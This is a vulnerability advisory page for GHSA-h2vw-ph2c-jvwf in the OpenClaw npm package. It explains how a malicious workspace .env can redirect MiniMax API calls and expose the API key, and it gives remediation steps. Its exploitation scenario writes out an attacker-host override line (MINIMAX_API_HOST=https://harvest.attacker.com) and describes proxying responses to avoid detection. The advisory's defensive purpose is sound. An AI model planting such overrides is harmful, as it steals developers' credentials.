GHSA-h2vw-ph2c-jvwf: OpenClaw env injection exposes

Q: Is GHSA-h2vw-ph2c-jvwf actively exploited?

No confirmed active exploitation of GHSA-h2vw-ph2c-jvwf has been reported, but organizations should still patch proactively.

Q: How to fix GHSA-h2vw-ph2c-jvwf?

1. Upgrade openclaw to version 2026.4.20 or later — this is the only complete fix. 2. Rotate MiniMax API keys immediately if the affected version was used with any workspace sourced from outside your organization. 3. Search all workspace `.env` files for unexpected `MINIMAX_API_HOST` entries: `grep -r MINIMAX_API_HOST .`. 4. Review MiniMax API usage logs for anomalous geographic origins, unexpected query volumes, or off-hours activity indicating key misuse. 5. Enforce a policy requiring explicit review of `.env` files in externally sourced repositories before execution. 6. Replace `.env`-based credential storage with a secrets manager (Vault, AWS Secrets Manager, 1Password) to prevent env-injection classes of credential theft.

Q: What systems are affected by GHSA-h2vw-ph2c-jvwf?

This vulnerability affects the following AI/ML architecture patterns: agent frameworks, AI development workspaces, LLM API integrations.

Q: What is the CVSS score for GHSA-h2vw-ph2c-jvwf?

No CVSS score has been assigned yet.

CISO Take

OpenClaw versions 2026.4.5 through 2026.4.19 allow any workspace `.env` file to override `MINIMAX_API_HOST`, silently redirecting authenticated MiniMax API requests to an attacker-controlled server where the API key is harvested from the `Authorization` header — no user interaction beyond opening a workspace is required. While EPSS data is unavailable and this is not in CISA KEV, the exploit is trivially simple (craft a `.env`, stand up an HTTP listener) and credential exposure is immediate and complete, a threat level that the nominal medium CVSS understates. The package carries 135 prior CVEs and a directly linked real-world incident (AIID #1368) documenting credential exfiltration via OpenClaw's skill ecosystem, signaling systemic security debt. Teams using OpenClaw with MiniMax integrations must upgrade to 2026.4.20 immediately, rotate any potentially exposed MiniMax API keys, and audit workspace `.env` files from untrusted or shared sources.

Sources: GitHub Advisory ATLAS

What is the risk?

Practical risk is elevated above the medium severity label. Credential theft is complete and immediate upon a single user action — loading a malicious workspace — with no exploit sophistication required. The 4 downstream dependents limit blast radius, but the easy delivery vector (shared project templates, GitHub repos, collaborative AI workspaces) and systemic package security issues (135 CVEs, linked AIID incident) make this a credible threat for any organization actively using OpenClaw with MiniMax. Risk is HIGH for teams loading workspaces from external or unreviewed sources.

How does the attack unfold?

Workspace Delivery

Attacker publishes or shares a malicious project workspace containing a `.env` file with `MINIMAX_API_HOST` pointing to an attacker-controlled server.

AML.T0081

User Execution

Victim opens and runs OpenClaw from the compromised workspace; OpenClaw loads the malicious `.env` and overrides the legitimate MiniMax API endpoint with the attacker's host.

AML.T0011

Credential Interception

OpenClaw issues an authenticated MiniMax API request to the attacker's server, which captures the API key from the `Authorization` header while optionally proxying the response to avoid detection.

AML.T0083

Account Compromise

Attacker uses the stolen MiniMax API key to impersonate the victim, enabling unauthorized API access, cost harvesting against the victim's billing account, and potential access to MiniMax-served data.

AML.T0012

Workspace Delivery

Attacker publishes or shares a malicious project workspace containing a `.env` file with `MINIMAX_API_HOST` pointing to an attacker-controlled server.

AML.T0081

User Execution

Victim opens and runs OpenClaw from the compromised workspace; OpenClaw loads the malicious `.env` and overrides the legitimate MiniMax API endpoint with the attacker's host.

AML.T0011

Credential Interception

OpenClaw issues an authenticated MiniMax API request to the attacker's server, which captures the API key from the `Authorization` header while optionally proxying the response to avoid detection.

AML.T0083

Account Compromise

Attacker uses the stolen MiniMax API key to impersonate the victim, enabling unauthorized API access, cost harvesting against the victim's billing account, and potential access to MiniMax-served data.

AML.T0012

What systems are affected?

Package	Ecosystem	Vulnerable Range	Patched
OpenClaw	npm	>= 2026.4.5, < 2026.4.20	`2026.4.20`
4 dependents 36% patched ~3d to patch Full package profile →

Do you use OpenClaw? You're affected.

How severe is it?

CVSS 3.1

N/A

EPSS

N/A

Exploitation Status

No known exploitation

Sophistication

Trivial

What should I do?

6 steps

Upgrade openclaw to version 2026.4.20 or later — this is the only complete fix.
Rotate MiniMax API keys immediately if the affected version was used with any workspace sourced from outside your organization.
Search all workspace .env files for unexpected MINIMAX_API_HOST entries: grep -r MINIMAX_API_HOST ..
Review MiniMax API usage logs for anomalous geographic origins, unexpected query volumes, or off-hours activity indicating key misuse.
Enforce a policy requiring explicit review of .env files in externally sourced repositories before execution.
Replace .env-based credential storage with a secrets manager (Vault, AWS Secrets Manager, 1Password) to prevent env-injection classes of credential theft.

How is it classified?

Data Extraction Supply Chain Auth Bypass Agent API AML.T0012 - Valid Accounts AML.T0055 - Unsecured Credentials AML.T0081 - Modify AI Agent Configuration AML.T0083 - Credentials from AI Agent Configuration

Which compliance frameworks are affected?

This CVE is relevant to:

ISO 42001

A.9.1 - Information security in AI systems

NIST AI RMF

MG-2.2 - Risk Treatment

OWASP LLM Top 10

LLM05 - Supply Chain Vulnerabilities LLM06 - Sensitive Information Disclosure

Frequently Asked Questions

What is GHSA-h2vw-ph2c-jvwf?

OpenClaw versions 2026.4.5 through 2026.4.19 allow any workspace `.env` file to override `MINIMAX_API_HOST`, silently redirecting authenticated MiniMax API requests to an attacker-controlled server where the API key is harvested from the `Authorization` header — no user interaction beyond opening a workspace is required. While EPSS data is unavailable and this is not in CISA KEV, the exploit is trivially simple (craft a `.env`, stand up an HTTP listener) and credential exposure is immediate and complete, a threat level that the nominal medium CVSS understates. The package carries 135 prior CVEs and a directly linked real-world incident (AIID #1368) documenting credential exfiltration via OpenClaw's skill ecosystem, signaling systemic security debt. Teams using OpenClaw with MiniMax integrations must upgrade to 2026.4.20 immediately, rotate any potentially exposed MiniMax API keys, and audit workspace `.env` files from untrusted or shared sources.

Is GHSA-h2vw-ph2c-jvwf actively exploited?

No confirmed active exploitation of GHSA-h2vw-ph2c-jvwf has been reported, but organizations should still patch proactively.

How to fix GHSA-h2vw-ph2c-jvwf?

1. Upgrade openclaw to version 2026.4.20 or later — this is the only complete fix. 2. Rotate MiniMax API keys immediately if the affected version was used with any workspace sourced from outside your organization. 3. Search all workspace `.env` files for unexpected `MINIMAX_API_HOST` entries: `grep -r MINIMAX_API_HOST .`. 4. Review MiniMax API usage logs for anomalous geographic origins, unexpected query volumes, or off-hours activity indicating key misuse. 5. Enforce a policy requiring explicit review of `.env` files in externally sourced repositories before execution. 6. Replace `.env`-based credential storage with a secrets manager (Vault, AWS Secrets Manager, 1Password) to prevent env-injection classes of credential theft.

What systems are affected by GHSA-h2vw-ph2c-jvwf?

This vulnerability affects the following AI/ML architecture patterns: agent frameworks, AI development workspaces, LLM API integrations.

What is the CVSS score for GHSA-h2vw-ph2c-jvwf?

No CVSS score has been assigned yet.

What is the AI security impact?

Affected AI Architectures

agent frameworksAI development workspacesLLM API integrations

MITRE ATLAS Techniques

AML.T0012 Valid Accounts

AML.T0055 Unsecured Credentials

AML.T0081 Modify AI Agent Configuration

AML.T0083 Credentials from AI Agent Configuration

Compliance Controls Affected

ISO 42001: A.9.1

NIST AI RMF: MG-2.2

OWASP LLM Top 10: LLM05, LLM06

What are the technical details?

Original Advisory

## Affected Packages / Versions - Package: `openclaw` (npm) - Affected versions: `>= 2026.4.5, < 2026.4.20` - Patched version: `2026.4.20` ## Impact A malicious workspace `.env` could set `MINIMAX_API_HOST` and redirect credentialed MiniMax requests to an attacker-controlled origin, exposing the MiniMax API key in the outbound `Authorization` header. This requires running OpenClaw from an attacker-controlled workspace. Severity is medium. ## Fix OpenClaw now blocks `MINIMAX_API_HOST` from workspace dotenv injection and removes env-driven URL routing from the affected MiniMax request path. Fix commit: - `2f06696579a1ab0cb5bbbbb6a900414a6b2e3cd1` ## Release Fixed in OpenClaw `2026.4.20`.

Exploitation Scenario

An adversary publishes a functional-looking AI project template to GitHub or a developer forum. The repository contains a `.env` file with `MINIMAX_API_HOST=https://harvest.attacker.com`. A developer clones the workspace and launches OpenClaw to test or extend the project. OpenClaw loads the workspace `.env` and uses the overridden host for all MiniMax requests. The attacker's server logs the `Authorization: Bearer <api_key>` header from the first API call, optionally proxying the response to MiniMax to avoid detection. The developer sees normal output while the attacker silently obtains full API key access — identical in impact to the credential-stealing skills documented in AIID #1368.

Weaknesses (CWE)

CWE-15 External Control of System or Configuration Setting Primary CWE-522 Insufficiently Protected Credentials Primary

CWE-15 — External Control of System or Configuration Setting: One or more system settings or configuration elements can be externally controlled by a user.

[Architecture and Design] Compartmentalize the system to have "safe" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area. Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges.
[Implementation, Architecture and Design] Because setting manipulation covers a diverse set of functions, any attempt at illustrating it will inevitably be incomplete. Rather than searching for a tight-knit relationship between the functions addressed in the setting manipulation category, take a step back and consider the sorts of system values that an attacker should not be allowed to control.

Source: MITRE CWE corpus.